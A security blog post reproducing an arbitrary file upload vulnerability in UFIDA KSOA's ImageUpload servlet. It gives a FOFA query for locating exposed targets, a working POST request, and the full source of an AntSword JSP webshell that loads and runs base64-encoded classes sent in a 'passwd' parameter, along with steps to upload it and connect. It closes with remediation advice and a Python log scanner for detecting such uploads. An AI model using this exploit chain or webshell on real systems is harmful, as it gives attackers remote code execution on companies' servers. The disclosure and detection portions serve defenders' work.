UFIDA KSOA ImageUpload Arbitrary File Upload Vulnerability Reproduction + Exploitation

1. Product introduction

UFIDA KSOA is a new-generation product developed under the guidance of the SOA concept. It is a unified IT infrastructure built for the cutting-edge IT needs of distribution companies. It allows the IT systems that distribution companies established in different periods to communicate easily with each other, helping them protect their original IT investment, simplify IT management, enhance competitiveness, and support the company's overall strategic goals and innovation activities.

2. Vulnerability overview

The ImageUpload servlet of the UFIDA KSOA platform contains an arbitrary file upload vulnerability; because the uploaded file name and path are not restricted, an attacker can upload a server-side script and obtain server privileges.

3. Affected scope

UFIDA Enterprise Information Integration Platform KSOA v9.0

4. Reproduction environment

FOFA: app="Yonyou-Time and Space KSOA"

5. Vulnerability reproduction

Capture the home-page request in Burp and send it to the Repeater module to reproduce the issue.

POC

POST /servlet/com.sksoft.bill.ImageUpload?filename=[uploaded file name]&filepath=/ HTTP/1.1
Host: your-ip

[file content]

Reproduction succeeded: the file named in the filename parameter is written to the location given by filepath.

6. Exploitation

The application is written in Java, so try uploading an AntSword JSP one-line webshell directly; the connection password is passwd.

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

Verify that the uploaded file is parsed and executed as JSP by the server.

No problem; open AntSword and try to connect (remember to delete the backdoor after testing).

7. Remediation suggestions

Upgrade to a patched version or apply the vendor patch.

Reduce Internet exposure of the platform, restrict the types of files that can be uploaded, and tighten upload blacklist and whitelist constraints (in particular, reject server-side script extensions such as .jsp and reject a filepath that leaves the intended upload directory).
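Besides patching, defenders can hunt for abuse of this endpoint in web-server access logs. The following detection script is an added example written for this page, not code from the original post or from the vendor; the log lines, IP addresses and file names it contains are constructed samples, and the set of flagged extensions is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2023:10:01:02 +0800] "POST /servlet/com.sksoft.bill.ImageUpload?filename=logo.png&filepath=/ HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Apr/2023:10:01:07 +0800] "POST /servlet/com.sksoft.bill.ImageUpload?filename=shell.jsp&filepath=/ HTTP/1.1" 200 12 "-" "python-requests/2.28"
10.0.0.9 - - [10/Apr/2023:10:01:09 +0800] "GET /shell.jsp?passwd=AAAA HTTP/1.1" 200 0 "-" "antSword/v2.1"
10.0.0.7 - - [10/Apr/2023:10:02:00 +0800] "POST /servlet/com.sksoft.bill.ImageUpload?filename=a.png&filepath=../../webapps/ROOT/ HTTP/1.1" 200 12 "-" "curl/7.88"
10.0.0.3 - - [10/Apr/2023:10:03:00 +0800] "GET /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

UPLOAD_PATH = "/servlet/com.sksoft.bill.ImageUpload"   # vulnerable servlet from the POC
# Assumed list of extensions a Java servlet container would execute as code.
SCRIPT_EXTS = {"jsp", "jspx", "jspf", "jsw", "jsv", "war"}
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

def check_request(method, url):
    """Return a reason string if this request looks like abuse of ImageUpload, else None."""
    if method.upper() != "POST" or urlsplit(url).path != UPLOAD_PATH:
        return None
    params = parse_qs(urlsplit(url).query)
    filename = unquote(params.get("filename", [""])[0])
    filepath = unquote(params.get("filepath", [""])[0])
    # Look at every extension segment so double extensions (x.jsp.png) are caught too.
    exts = {seg.lower() for seg in filename.split(".")[1:]}
    if exts & SCRIPT_EXTS:
        return f"server-side script upload: {filename}"
    # filepath is attacker-controlled; ".." segments mean the write escapes the upload dir.
    if ".." in filepath.replace("\\", "/").split("/"):
        return f"path traversal in filepath: {filepath}"
    return None

def scan_log(text):
    """Parse combined-format log lines and return (client_ip, reason) for each suspicious upload."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = check_request(m["method"], m["url"])
        if reason:
            findings.append((m["ip"], reason))
    return findings

if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

A hit on a script upload is worth correlating with later requests for the same file name (the third sample line) to confirm whether the uploaded file was actually reached.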


Source: blog.csdn.net/qq_41904294/article/details/129954240